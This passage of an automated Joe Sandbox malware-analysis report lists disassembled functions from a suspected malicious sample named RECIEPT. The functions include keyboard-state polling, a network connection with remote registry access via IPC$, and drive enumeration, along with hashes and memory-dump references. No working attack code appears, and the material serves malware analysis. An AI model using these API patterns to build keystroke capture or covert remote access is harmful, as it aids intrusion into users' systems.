                                        • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                        • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                        APIs
                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                        • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                        • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                        • _memmove.LIBCMT ref: 00467EB8
                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                        • _memmove.LIBCMT ref: 00467F6C
                                        • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                        • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                        • String ID:
                                        • API String ID: 2170234536-0
                                        • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                        • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                        • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                        • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00453CE0
                                        • SetKeyboardState.USER32(?), ref: 00453D3B
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                        • GetKeyState.USER32(000000A0), ref: 00453D75
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                        • GetKeyState.USER32(000000A1), ref: 00453DB5
                                        • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                        • GetKeyState.USER32(00000011), ref: 00453DEF
                                        • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                        • GetKeyState.USER32(00000012), ref: 00453E26
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                        • GetKeyState.USER32(0000005B), ref: 00453E5D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                        • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                        • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                        • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                        • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                        • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                        • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                        • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                        • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                        • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                        • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                        • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                        • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                        • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                        • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                        • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                        • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                        • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                        • DeleteObject.GDI32(?), ref: 0047151E
                                        • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                        • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                        • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                        • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                        • DeleteObject.GDI32(?), ref: 004715EA
                                        • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                        • String ID:
                                        • API String ID: 3218148540-0
                                        • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                        • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                        • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                        • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                        • String ID:
                                        • API String ID: 136442275-0
                                        • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                        • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                        • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                        • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                        APIs
                                        • _wcsncpy.LIBCMT ref: 00467490
                                        • _wcsncpy.LIBCMT ref: 004674BC
                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                        • _wcstok.LIBCMT ref: 004674FF
                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                        • _wcstok.LIBCMT ref: 004675B2
                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                        • _wcslen.LIBCMT ref: 00467793
                                        • _wcscpy.LIBCMT ref: 00467641
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • _wcslen.LIBCMT ref: 004677BD
                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                        • String ID: X
                                        • API String ID: 3104067586-3081909835
                                        • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                        • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                        • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                        • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                        • _wcslen.LIBCMT ref: 004610A3
                                        • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                        • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                        • GetWindowRect.USER32(?,?), ref: 00461248
                                          • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                        • String ID: ThumbnailClass
                                        • API String ID: 4136854206-1241985126
                                        • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                        • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                        • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                        • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                        APIs
                                        • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                        • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                        • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                        • GetClientRect.USER32(?,?), ref: 00471A1A
                                        • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                        • DestroyIcon.USER32(?), ref: 00471AF4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                        • String ID: 2
                                        • API String ID: 1331449709-450215437
                                        • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                        • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                        • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                        • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                        • __swprintf.LIBCMT ref: 00460915
                                        • __swprintf.LIBCMT ref: 0046092D
                                        • _wprintf.LIBCMT ref: 004609E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                        • API String ID: 3054410614-2561132961
                                        • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                        • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                        • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                        • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                        APIs
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                        • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                        • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                        • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                        • API String ID: 600699880-22481851
                                        • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                        • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                        • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                        • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DestroyWindow
                                        • String ID: static
                                        • API String ID: 3375834691-2160076837
                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                        • API String ID: 2907320926-3566645568
                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                        APIs
                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                        • DeleteObject.GDI32(02E26790), ref: 00470A04
                                        • DestroyIcon.USER32(00000007), ref: 00470A1C
                                        • DeleteObject.GDI32(27021695), ref: 00470A34
                                        • DestroyWindow.USER32(0054005C), ref: 00470A4C
                                        • DestroyIcon.USER32(?), ref: 00470A73
                                        • DestroyIcon.USER32(?), ref: 00470A81
                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
